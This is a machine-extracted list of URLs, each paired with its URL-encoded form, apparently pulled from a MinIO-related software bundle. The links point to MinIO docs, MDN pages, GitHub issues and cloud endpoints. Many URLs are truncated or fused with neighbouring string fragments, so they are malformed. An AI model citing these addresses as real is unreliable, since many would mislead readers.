[https://min.io/docs/minio/linux/operations/install-deploy-manage/deploy-m](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Foperations%2Finstall-deploy-manage%2Fdeploy-m)
[https://min.io/docs/minio/linux/operations/install-deploy-manage/migrate-](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Foperations%2Finstall-deploy-manage%2Fmigrate-)
[https://min.io/docs/minio/linux/operations/install-deploy-manage/multi-si](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Foperations%2Finstall-deploy-manage%2Fmulti-si)
[https://min.io/docs/minio/linux/operations/monitoring/collect-minio-metri](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Foperations%2Fmonitoring%2Fcollect-minio-metri)
[https://min.io/docs/minio/linux/reference/minio-mc-admin/mc-admin-config.](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Freference%2Fminio-mc-admin%2Fmc-admin-config.)
[https://min.io/docs/minio/linux/reference/minio-mc-admin/mc-admin-heal.ht](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Freference%2Fminio-mc-admin%2Fmc-admin-heal.ht)
[https://min.io/docs/minio/macos/administration/object-management/object-r](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fmacos%2Fadministration%2Fobject-management%2Fobject-r)
[https://min.io/docs/minio/macos/operations/install-deploy-manage/deploy-m](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fmacos%2Foperations%2Finstall-deploy-manage%2Fdeploy-m)
[https://min.io/docs/minio/windows/administration/console/managing-deploym](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fwindows%2Fadministration%2Fconsole%2Fmanaging-deploym)
[https://min.io/docs/minio/windows/administration/object-management/object](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fwindows%2Fadministration%2Fobject-management%2Fobject)
[https://min.io/docs/minio/windows/administration/object-management/transi](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fwindows%2Fadministration%2Fobject-management%2Ftransi)
[https://min.io/docs/minio/windows/operations/data-recovery/recover-after-](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fwindows%2Foperations%2Fdata-recovery%2Frecover-after-)
[https://min.io/docs/minio/windows/operations/monitoring/minio-logging.htm](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fwindows%2Foperations%2Fmonitoring%2Fminio-logging.htm)
[https://ossrdbms-aad.database.cloudapi.decloud.google.com/go/storage.Buck](https%3A%2F%2Fossrdbms-aad.database.cloudapi.decloud.google.com%2Fgo%2Fstorage.Buck)
[https://searchfox.org/mozilla-central/rev/4a590a5a15e35d88a3b23dd6ac3c471](https%3A%2F%2Fsearchfox.org%2Fmozilla-central%2Frev%2F4a590a5a15e35d88a3b23dd6ac3c471)
[https://stackoverflow.com/questions/13382516/getting-scroll-bar-width-usi](https%3A%2F%2Fstackoverflow.com%2Fquestions%2F13382516%2Fgetting-scroll-bar-width-usi)
[https://stackoverflow.com/questions/59694142/regex-testvalue-returns-true](https%3A%2F%2Fstackoverflow.com%2Fquestions%2F59694142%2Fregex-testvalue-returns-true)
[https://storage.azure.com/database.usgovcloudapi.netcloudapp.usgovcloudap](https%3A%2F%2Fstorage.azure.com%2Fdatabase.usgovcloudapi.netcloudapp.usgovcloudap)
[https://vault.azure.cn/vault.microsoftazure.deRetentionExpirationTimerete](https%3A%2F%2Fvault.azure.cn%2Fvault.microsoftazure.deRetentionExpirationTimerete)
[https://vault.azure.cnazuretrafficmanager.deservicebus.cloudapi.deAZUREUS](https%3A%2F%2Fvault.azure.cnazuretrafficmanager.deservicebus.cloudapi.deAZUREUS)
[https://vault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttp](https%3A%2F%2Fvault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttp)
[https://www.linuxfoundation.org/hs-fs/hubfs/trademark-kubernetes-icon-cor](https%3A%2F%2Fwww.linuxfoundation.org%2Fhs-fs%2Fhubfs%2Ftrademark-kubernetes-icon-cor)
[https://github.com/minio/minio/tree/master/docs/site-replication?ref=con](https%3A%2F%2Fgithub.com%2Fminio%2Fminio%2Ftree%2Fmaster%2Fdocs%2Fsite-replication%3Fref%3Dcon)
[https://min.io/docs/minio/kubernetes/upstream/operations/monitoring.html](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fkubernetes%2Fupstream%2Foperations%2Fmonitoring.html)
[https://min.io/docs/minio/linux/operations/monitoring/minio-logging.html](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Foperations%2Fmonitoring%2Fminio-logging.html)
[https://min.io/docs/minio/linux/reference/minio-mc/mc-anonymous-set.html](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Freference%2Fminio-mc%2Fmc-anonymous-set.html)
[https://min.io/docs/minio/linux/reference/minio-server/minio-server.html](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Freference%2Fminio-server%2Fminio-server.html)
[https://min.io/docs/minio/windows/administration/bucket-replication.html](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fwindows%2Fadministration%2Fbucket-replication.html)
[https://stackoverflow.com/questions/588004/is-floating-point-math-broken](https%3A%2F%2Fstackoverflow.com%2Fquestions%2F588004%2Fis-floating-point-math-broken)
[https://cdn.jsdelivr.net/npm/redoc/bundles/redoc.standalone.jswebsocket](https%3A%2F%2Fcdn.jsdelivr.net%2Fnpm%2Fredoc%2Fbundles%2Fredoc.standalone.jswebsocket)
[https://cloud.google.com/docs/authentication/external/set-up-adcneither](https%3A%2F%2Fcloud.google.com%2Fdocs%2Fauthentication%2Fexternal%2Fset-up-adcneither)
[https://developer.mozilla.org/en-US/docs/Web/API/File_System_Access_API](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FAPI%2FFile_System_Access_API)
[https://gallery.chinacloudapi.cn/mariadb.database.chinacloudapi.cnhttps](https%3A%2F%2Fgallery.chinacloudapi.cn%2Fmariadb.database.chinacloudapi.cnhttps)
[https://html.spec.whatwg.org/multipage/form-control-infrastructure.html](https%3A%2F%2Fhtml.spec.whatwg.org%2Fmultipage%2Fform-control-infrastructure.html)
[https://unpkg.com/swagger-ui-dist/swagger-ui-standalone-preset.jsunable](https%3A%2F%2Funpkg.com%2Fswagger-ui-dist%2Fswagger-ui-standalone-preset.jsunable)
[https://blog.min.io/content/images/size/w2000/2023/10/openid-minio.jpg](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw2000%2F2023%2F10%2Fopenid-minio.jpg)
[https://developer.mozilla.org/en-US/docs/Web/CSS/color_value/color-mix](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FCSS%2Fcolor_value%2Fcolor-mix)
[https://developer.mozilla.org/en-US/docs/Web/Media/Formats/Image_types](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FMedia%2FFormats%2FImage_types)
[https://github.com/cloudhead/less.js/blob/master/lib/less/functions.js](https%3A%2F%2Fgithub.com%2Fcloudhead%2Fless.js%2Fblob%2Fmaster%2Flib%2Fless%2Ffunctions.js)
[https://github.com/infusion/jQuery-xcolor/blob/master/jquery.xcolor.js](https%3A%2F%2Fgithub.com%2Finfusion%2FjQuery-xcolor%2Fblob%2Fmaster%2Fjquery.xcolor.js)
[https://github.com/lodash/lodash/blob/master/.internal/baseToString.js](https%3A%2F%2Fgithub.com%2Flodash%2Flodash%2Fblob%2Fmaster%2F.internal%2FbaseToString.js)
[https://images.unsplash.com/photo-1548197193-2c2df590e23f?crop=entropy](https%3A%2F%2Fimages.unsplash.com%2Fphoto-1548197193-2c2df590e23f%3Fcrop%3Dentropy)
[https://min.io/docs/minio/kubernetes/upstream/operations/concepts.html](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fkubernetes%2Fupstream%2Foperations%2Fconcepts.html)
[https://blog.min.io/content/images/size/w2000/2024/01/david-blog.jpeg](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw2000%2F2024%2F01%2Fdavid-blog.jpeg)
[https://developer.mozilla.org/en-US/docs/Web/API/DataTransferItemList](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FAPI%2FDataTransferItemList)
[https://developer.mozilla.org/en-US/docs/Web/API/FileSystemFileHandle](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FAPI%2FFileSystemFileHandle)
[https://developer.mozilla.org/en-US/docs/Web/Security/Secure_Contexts](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FSecurity%2FSecure_Contexts)
[https://github.com/amilajack/eslint-plugin-flowtype-errors/issues/133](https%3A%2F%2Fgithub.com%2Familajack%2Feslint-plugin-flowtype-errors%2Fissues%2F133)
[https://github.com/minio/minio/tree/master/docs/erasure/storage-class](https%3A%2F%2Fgithub.com%2Fminio%2Fminio%2Ftree%2Fmaster%2Fdocs%2Ferasure%2Fstorage-class)
[https://min.io/docs/minio/linux/administration/object-management.html](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Fadministration%2Fobject-management.html)
[https://min.io/docs/minio/macos/administration/object-management.html](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fmacos%2Fadministration%2Fobject-management.html)
[https://blog.min.io/regulatory-compliance-with-minio-object-lambdas/](https%3A%2F%2Fblog.min.io%2Fregulatory-compliance-with-minio-object-lambdas%2F)
[https://developer.mozilla.org/en-US/docs/Web/API/FileSystemFileEntry](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FAPI%2FFileSystemFileEntry)
[https://developer.mozilla.org/en-US/docs/Web/HTML/Element/input/file](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FHTML%2FElement%2Finput%2Ffile)
[https://docs.aws.amazon.com/IAM/latest/UserGuide/reference-arns.html](https%3A%2F%2Fdocs.aws.amazon.com%2FIAM%2Flatest%2FUserGuide%2Freference-arns.html)
[https://github.com/DefinitelyTyped/DefinitelyTyped/discussions/66042](https%3A%2F%2Fgithub.com%2FDefinitelyTyped%2FDefinitelyTyped%2Fdiscussions%2F66042)
[https://github.com/defunctzombie/node-process/blob/master/browser.js](https%3A%2F%2Fgithub.com%2Fdefunctzombie%2Fnode-process%2Fblob%2Fmaster%2Fbrowser.js)
[https://github.com/go-sql-driver/mysql/wiki/old_passwordsSingle-Node](https%3A%2F%2Fgithub.com%2Fgo-sql-driver%2Fmysql%2Fwiki%2Fold_passwordsSingle-Node)
[https://github.com/remix-run/history/tree/main/docs/api-reference.md](https%3A%2F%2Fgithub.com%2Fremix-run%2Fhistory%2Ftree%2Fmain%2Fdocs%2Fapi-reference.md)
[https://min.io/docs/minio/linux/operations/external-iam.html?ref=con](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Foperations%2Fexternal-iam.html%3Fref%3Dcon)
[https://min.io/docs/minio/linux/reference/minio-mc/mc-quota-set.html](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Freference%2Fminio-mc%2Fmc-quota-set.html)
[https://vault.usgovcloudapi.net/mysql.database.usgovcloudapi.nethttp](https%3A%2F%2Fvault.usgovcloudapi.net%2Fmysql.database.usgovcloudapi.nethttp)
[https://batch.chinacloudapi.cn/mysql.database.chinacloudapi.cnhttps](https%3A%2F%2Fbatch.chinacloudapi.cn%2Fmysql.database.chinacloudapi.cnhttps)
[https://blog.min.io/content/images/size/w2000/2024/01/IMG_7378.jpeg](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw2000%2F2024%2F01%2FIMG_7378.jpeg)
[https://developer.mozilla.org/en-US/docs/Web/API/DataTransfer/items](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FAPI%2FDataTransfer%2Fitems)
[https://developer.mozilla.org/en-US/docs/Web/API/DataTransfer/types](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FAPI%2FDataTransfer%2Ftypes)
[https://developer.mozilla.org/en-US/docs/Web/API/KeyboardEvent/code](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FAPI%2FKeyboardEvent%2Fcode)
[https://blog.min.io/content/images/size/w2000/2020/08/Cohasset.png](https%3A%2F%2Fblog.min.io%2Fcontent%2Fimages%2Fsize%2Fw2000%2F2020%2F08%2FCohasset.png)
[https://developer.mozilla.org/en-US/docs/Web/API/KeyboardEvent/key](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FAPI%2FKeyboardEvent%2Fkey)
[https://dl.min.io/client/mc/release/linux-amd64/mc.sha256sumUnable](https%3A%2F%2Fdl.min.io%2Fclient%2Fmc%2Frelease%2Flinux-amd64%2Fmc.sha256sumUnable)
[https://github.com/WebReflection/get-own-property-symbols/issues/4](https%3A%2F%2Fgithub.com%2FWebReflection%2Fget-own-property-symbols%2Fissues%2F4)
[https://github.com/mozilla/source-map/blob/58819f0/source-map.d.ts](https%3A%2F%2Fgithub.com%2Fmozilla%2Fsource-map%2Fblob%2F58819f0%2Fsource-map.d.ts)
[https://min.io/docs/minio/linux/operations/network-encryption.html](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Foperations%2Fnetwork-encryption.html)
[https://blog.min.io/continuous-data-protection-versioning-rewind/](https%3A%2F%2Fblog.min.io%2Fcontinuous-data-protection-versioning-rewind%2F)
[https://blog.min.io/object-locking-versioning-and-holds-in-minio/](https%3A%2F%2Fblog.min.io%2Fobject-locking-versioning-and-holds-in-minio%2F)
[https://blog.min.io/object-storage-low-level-performance-testing/](https%3A%2F%2Fblog.min.io%2Fobject-storage-low-level-performance-testing%2F)
[https://developer.mozilla.org/en-US/docs/Web/API/FileSystemHandle](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FAPI%2FFileSystemHandle)
[https://github.com/minio/minio/tree/master/docs/debugging?ref=con](https%3A%2F%2Fgithub.com%2Fminio%2Fminio%2Ftree%2Fmaster%2Fdocs%2Fdebugging%3Fref%3Dcon)
[https://github.com/remarkjs/react-markdown/blob/main/changelog.md](https%3A%2F%2Fgithub.com%2Fremarkjs%2Freact-markdown%2Fblob%2Fmain%2Fchangelog.md)
[https://i.ytimg.com/an_webp/7EJO_iRiB2s/mqdefault_6s.webp?du=3000](https%3A%2F%2Fi.ytimg.com%2Fan_webp%2F7EJO_iRiB2s%2Fmqdefault_6s.webp%3Fdu%3D3000)
[https://i.ytimg.com/an_webp/UGROqu7mYJs/mqdefault_6s.webp?du=3000](https%3A%2F%2Fi.ytimg.com%2Fan_webp%2FUGROqu7mYJs%2Fmqdefault_6s.webp%3Fdu%3D3000)
[https://i.ytimg.com/an_webp/Yh_1grPSBjw/mqdefault_6s.webp?du=3000](https%3A%2F%2Fi.ytimg.com%2Fan_webp%2FYh_1grPSBjw%2Fmqdefault_6s.webp%3Fdu%3D3000)
[https://i.ytimg.com/an_webp/Zyc-xhNcPco/mqdefault_6s.webp?du=3000](https%3A%2F%2Fi.ytimg.com%2Fan_webp%2FZyc-xhNcPco%2Fmqdefault_6s.webp%3Fdu%3D3000)
[https://i.ytimg.com/an_webp/_ZEjm4bPgVI/mqdefault_6s.webp?du=3000](https%3A%2F%2Fi.ytimg.com%2Fan_webp%2F_ZEjm4bPgVI%2Fmqdefault_6s.webp%3Fdu%3D3000)
[https://i.ytimg.com/an_webp/mv8I1wvTCrE/mqdefault_6s.webp?du=3000](https%3A%2F%2Fi.ytimg.com%2Fan_webp%2Fmv8I1wvTCrE%2Fmqdefault_6s.webp%3Fdu%3D3000)
[https://www.googleapis.com/auth/devstorage.read_writeinsufficient](https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fdevstorage.read_writeinsufficient)
[https://blog.min.io/stream-data-to-minio-using-kafka-kubernetes/](https%3A%2F%2Fblog.min.io%2Fstream-data-to-minio-using-kafka-kubernetes%2F)
[https://cldr.unicode.org/translation/date-time/date-time-symbols](https%3A%2F%2Fcldr.unicode.org%2Ftranslation%2Fdate-time%2Fdate-time-symbols)
[https://css-tricks.com/debouncing-throttling-explained-examples/](https%3A%2F%2Fcss-tricks.com%2Fdebouncing-throttling-explained-examples%2F)
[https://developer.mozilla.org/en-US/docs/Web/API/FileSystemEntry](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FAPI%2FFileSystemEntry)
[https://github.com/lodash/lodash/blob/master/.internal/getTag.js](https%3A%2F%2Fgithub.com%2Flodash%2Flodash%2Fblob%2Fmaster%2F.internal%2FgetTag.js)
[https://min.io/docs/minio/kubernetes/upstream/index.html?ref=con](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fkubernetes%2Fupstream%2Findex.html%3Fref%3Dcon)
[https://reactcommunity.org/react-transition-group/css-transition](https%3A%2F%2Freactcommunity.org%2Freact-transition-group%2Fcss-transition)
[https://www.googleapis.com/auth/cloud-platform.read-onlyduration](https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform.read-onlyduration)
[https://blog.min.io/minio-multi-site-active-active-replication/](https%3A%2F%2Fblog.min.io%2Fminio-multi-site-active-active-replication%2F)
[https://database.windows.net/postgres.database.cloudapi.dehttps](https%3A%2F%2Fdatabase.windows.net%2Fpostgres.database.cloudapi.dehttps)
[https://developer.mozilla.org/en-US/docs/Web/SVG/Attribute/type](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FSVG%2FAttribute%2Ftype)
[https://github.com/nodejs/node/blob/fcf8ba4/lib/internal/url.js](https%3A%2F%2Fgithub.com%2Fnodejs%2Fnode%2Fblob%2Ffcf8ba4%2Flib%2Finternal%2Furl.js)
[https://github.com/urfave/cli/blob/master/CHANGELOG.mdoperation](https%3A%2F%2Fgithub.com%2Furfave%2Fcli%2Fblob%2Fmaster%2FCHANGELOG.mdoperation)
[https://min.io/docs/minio/linux/operations/troubleshooting.html](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Foperations%2Ftroubleshooting.html)
[https://min.io/docs/minio/windows/operations/data-recovery.html](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fwindows%2Foperations%2Fdata-recovery.html)
[https://unpkg.com/swagger-ui-dist/favicon-32x32.pngadditionally](https%3A%2F%2Funpkg.com%2Fswagger-ui-dist%2Ffavicon-32x32.pngadditionally)
[https://developer.mozilla.org/en-US/docs/Web/API/DOMException.](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FAPI%2FDOMException.)
[https://github.com/mikolalysenko/binary-search-bounds/issues/5](https%3A%2F%2Fgithub.com%2Fmikolalysenko%2Fbinary-search-bounds%2Fissues%2F5)
[https://identity-provider-url/.well-known/openid-configuration](https%3A%2F%2Fidentity-provider-url%2F.well-known%2Fopenid-configuration)
[https://min.io/docs/minio/linux/administration/monitoring.html](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Fadministration%2Fmonitoring.html)
[https://min.io/docs/minio/linux/reference/minio-mc/mc-sql.html](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Freference%2Fminio-mc%2Fmc-sql.html)
[https://redux.js.org/tutorials/fundamentals/part-6-async-logic](https%3A%2F%2Fredux.js.org%2Ftutorials%2Ffundamentals%2Fpart-6-async-logic)
[https://storage.UNIVERSE_DOMAIN/storage/v1/gccl-invocation-id/](https%3A%2F%2Fstorage.UNIVERSE_DOMAIN%2Fstorage%2Fv1%2Fgccl-invocation-id%2F)
[https://www.googleapis.com/auth/devstorage.full_controlstorage](https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fdevstorage.full_controlstorage)
[https://bugs.chromium.org/p/chromium/issues/detail?id=1025564](https%3A%2F%2Fbugs.chromium.org%2Fp%2Fchromium%2Fissues%2Fdetail%3Fid%3D1025564)
[https://github.com/DefinitelyTyped/DefinitelyTyped/pull/55396](https%3A%2F%2Fgithub.com%2FDefinitelyTyped%2FDefinitelyTyped%2Fpull%2F55396)
[https://managedhsm.azure.netservicebus.usgovcloudapi.nethttps](https%3A%2F%2Fmanagedhsm.azure.netservicebus.usgovcloudapi.nethttps)
[https://min.io/docs/minio/linux/reference/minio-mc/mc-du.html](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Freference%2Fminio-mc%2Fmc-du.html)
[https://min.io/docs/minio/linux/reference/minio-mc/mc-mb.html](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Freference%2Fminio-mc%2Fmc-mb.html)
[https://www.typescriptlang.org/docs/handbook/2/narrowing.html](https%3A%2F%2Fwww.typescriptlang.org%2Fdocs%2Fhandbook%2F2%2Fnarrowing.html)
[https://accounts.google.com/.well-known/openid-configuration](https%3A%2F%2Faccounts.google.com%2F.well-known%2Fopenid-configuration)
[https://blog.min.io/how-do-i-know-replication-is-up-to-date/](https%3A%2F%2Fblog.min.io%2Fhow-do-i-know-replication-is-up-to-date%2F)
[https://github.com/lodash/lodash/blob/4.17.15/dist/lodash.js](https%3A%2F%2Fgithub.com%2Flodash%2Flodash%2Fblob%2F4.17.15%2Fdist%2Flodash.js)
[https://html.spec.whatwg.org/multipage/nav-history-apis.html](https%3A%2F%2Fhtml.spec.whatwg.org%2Fmultipage%2Fnav-history-apis.html)
[https://manage.microsoftazure.de/publishsettings/indexunable](https%3A%2F%2Fmanage.microsoftazure.de%2Fpublishsettings%2Findexunable)
[https://manage.windowsazure.com/publishsettings/indexstorage](https%3A%2F%2Fmanage.windowsazure.com%2Fpublishsettings%2Findexstorage)
[https://unpkg.com/swagger-ui-dist/swagger-ui-bundle.jsfactor](https%3A%2F%2Funpkg.com%2Fswagger-ui-dist%2Fswagger-ui-bundle.jsfactor)
[https://en.wikipedia.org/wiki/Free_and_open-source_software](https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FFree_and_open-source_software)
[https://github.com/ai/nanoid/blob/3.0.2/non-secure/index.js](https%3A%2F%2Fgithub.com%2Fai%2Fnanoid%2Fblob%2F3.0.2%2Fnon-secure%2Findex.js)
[https://github.com/react-dropzone/react-dropzone/issues/276](https%3A%2F%2Fgithub.com%2Freact-dropzone%2Freact-dropzone%2Fissues%2F276)
[https://github.com/react-dropzone/react-dropzone/issues/450](https%3A%2F%2Fgithub.com%2Freact-dropzone%2Freact-dropzone%2Fissues%2F450)
[https://github.com/request/request/search?q=ESOCKETTIMEDOUT](https%3A%2F%2Fgithub.com%2Frequest%2Frequest%2Fsearch%3Fq%3DESOCKETTIMEDOUT)
[https://github.com/sdecima/javascript-detect-element-resize](https%3A%2F%2Fgithub.com%2Fsdecima%2Fjavascript-detect-element-resize)
[https://html.spec.whatwg.org/multipage/structured-data.html](https%3A%2F%2Fhtml.spec.whatwg.org%2Fmultipage%2Fstructured-data.html)
[https://manage.chinacloudapi.com/publishsettings/indexhttps](https%3A%2F%2Fmanage.chinacloudapi.com%2Fpublishsettings%2Findexhttps)
[https://min.io/docs/minio/kubernetes/upstream/glossary.html](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fkubernetes%2Fupstream%2Fglossary.html)
[https://code.google.com/p/chromium/issues/detail?id=286360](https%3A%2F%2Fcode.google.com%2Fp%2Fchromium%2Fissues%2Fdetail%3Fid%3D286360)
[https://github.com/reactjs/react-transition-group/pull/749](https%3A%2F%2Fgithub.com%2Freactjs%2Freact-transition-group%2Fpull%2F749)
[https://manage.windowsazure.us/publishsettings/indexfailed](https%3A%2F%2Fmanage.windowsazure.us%2Fpublishsettings%2Findexfailed)
[https://min.io/docs/minio/linux/operations/monitoring.html](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Foperations%2Fmonitoring.html)
[https://min.io/docs/minio/windows/operations/concepts.html](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Fwindows%2Foperations%2Fconcepts.html)
[https://unpkg.com/swagger-ui-dist/swagger-ui.cssunexpected](https%3A%2F%2Funpkg.com%2Fswagger-ui-dist%2Fswagger-ui.cssunexpected)
[https://www.googleapis.com/auth/devstorage.read_onlyfailed](https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fdevstorage.read_onlyfailed)
[https://blog.min.io/complex-workflows-apache-kafka-minio/](https%3A%2F%2Fblog.min.io%2Fcomplex-workflows-apache-kafka-minio%2F)
[https://blog.min.io/event-notifications-vs-object-lambda/](https%3A%2F%2Fblog.min.io%2Fevent-notifications-vs-object-lambda%2F)
[https://developer.mozilla.org/en-US/docs/Web/API/FileList](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FWeb%2FAPI%2FFileList)
[https://github.com/lodash/lodash/blob/master/isBoolean.js](https%3A%2F%2Fgithub.com%2Flodash%2Flodash%2Fblob%2Fmaster%2FisBoolean.js)
[https://github.com/micromark/micromark-extension-footnote](https%3A%2F%2Fgithub.com%2Fmicromark%2Fmicromark-extension-footnote)
[https://github.com/minio/mc/issuespreferred_preauth_types](https%3A%2F%2Fgithub.com%2Fminio%2Fmc%2Fissuespreferred_preauth_types)
[https://github.com/reduxjs/redux-toolkit/discussions/1648](https%3A%2F%2Fgithub.com%2Freduxjs%2Fredux-toolkit%2Fdiscussions%2F1648)
[https://graph.windows.net/mariadb.database.azure.comhttps](https%3A%2F%2Fgraph.windows.net%2Fmariadb.database.azure.comhttps)
[https://reactrouter.com/utils/create-routes-from-children](https%3A%2F%2Freactrouter.com%2Futils%2Fcreate-routes-from-children)
[https://twitter.com/dan_abramov/status/770914221638942720](https%3A%2F%2Ftwitter.com%2Fdan_abramov%2Fstatus%2F770914221638942720)
[https://blog.min.io/minio-multi-cloud-azure-marketplace/](https%3A%2F%2Fblog.min.io%2Fminio-multi-cloud-azure-marketplace%2F)
[https://blog.min.io/minio-versioning-metadata-deep-dive/](https%3A%2F%2Fblog.min.io%2Fminio-versioning-metadata-deep-dive%2F)
[https://database.cloudapi.de/projects/-/serviceAccounts/](https%3A%2F%2Fdatabase.cloudapi.de%2Fprojects%2F-%2FserviceAccounts%2F)
[https://developer.mozilla.org/en-US/docs/Glossary/Base64](https%3A%2F%2Fdeveloper.mozilla.org%2Fen-US%2Fdocs%2FGlossary%2FBase64)
[https://github.com/facebook/create-react-app/issues/2374](https%3A%2F%2Fgithub.com%2Ffacebook%2Fcreate-react-app%2Fissues%2F2374)
[https://redux.js.org/introduction/why-rtk-is-redux-today](https%3A%2F%2Fredux.js.org%2Fintroduction%2Fwhy-rtk-is-redux-today)
[https://redux.js.org/tutorials/fundamentals/part-4-store](https%3A%2F%2Fredux.js.org%2Ftutorials%2Ffundamentals%2Fpart-4-store)
[https://unpkg.com/swagger-ui-dist/favicon-16x16.pnghttps](https%3A%2F%2Funpkg.com%2Fswagger-ui-dist%2Ffavicon-16x16.pnghttps)
[https://blog.min.io/minio-postgres-event-notifications/](https%3A%2F%2Fblog.min.io%2Fminio-postgres-event-notifications%2F)
[https://blog.min.io/subnet-healthcheck-and-performance/](https%3A%2F%2Fblog.min.io%2Fsubnet-healthcheck-and-performance%2F)
[https://min.io/docs/minio/linux/reference/minio-mc.html](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Freference%2Fminio-mc.html)
[https://reactrouter.com/router-components/memory-router](https%3A%2F%2Freactrouter.com%2Frouter-components%2Fmemory-router)
[https://blog.min.io/managing-objects-tagging-policies/](https%3A%2F%2Fblog.min.io%2Fmanaging-objects-tagging-policies%2F)
[https://blog.min.io/minio-webhook-event-notifications/](https%3A%2F%2Fblog.min.io%2Fminio-webhook-event-notifications%2F)
[https://github.com/nodejs/node/blob/master/lib/path.js](https%3A%2F%2Fgithub.com%2Fnodejs%2Fnode%2Fblob%2Fmaster%2Flib%2Fpath.js)
[https://github.com/remix-run/react-router/issues/10579](https%3A%2F%2Fgithub.com%2Fremix-run%2Freact-router%2Fissues%2F10579)
[https://github.com/remix-run/react-router/issues/11052](https%3A%2F%2Fgithub.com%2Fremix-run%2Freact-router%2Fissues%2F11052)
[https://reactjs.org/docs/error-decoder.html?invariant=](https%3A%2F%2Freactjs.org%2Fdocs%2Ferror-decoder.html%3Finvariant%3D)
[https://storage.mtls.googleapis.com/storage/v1/storage](https%3A%2F%2Fstorage.mtls.googleapis.com%2Fstorage%2Fv1%2Fstorage)
[https://www.googleapis.com/auth/devstorage.read_writeB](https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fdevstorage.read_writeB)
[https://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html](https%3A%2F%2Fwww.w3.org%2FProtocols%2Frfc2616%2Frfc2616-sec3.html)
[https://blog.min.io/minio-replication-best-practices/](https%3A%2F%2Fblog.min.io%2Fminio-replication-best-practices%2F)
[https://bugzilla.mozilla.org/show_bug.cgi?id=1719465.](https%3A%2F%2Fbugzilla.mozilla.org%2Fshow_bug.cgi%3Fid%3D1719465.)
[https://en.wikipedia.org/wiki/Content_Security_Policy](https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FContent_Security_Policy)
[https://github.com/bvaughn/react-virtualized/pull/124](https%3A%2F%2Fgithub.com%2Fbvaughn%2Freact-virtualized%2Fpull%2F124)
[https://github.com/bvaughn/react-virtualized/pull/942](https%3A%2F%2Fgithub.com%2Fbvaughn%2Freact-virtualized%2Fpull%2F942)
[https://github.com/remarkjs/react-markdown/issues/576](https%3A%2F%2Fgithub.com%2Fremarkjs%2Freact-markdown%2Fissues%2F576)
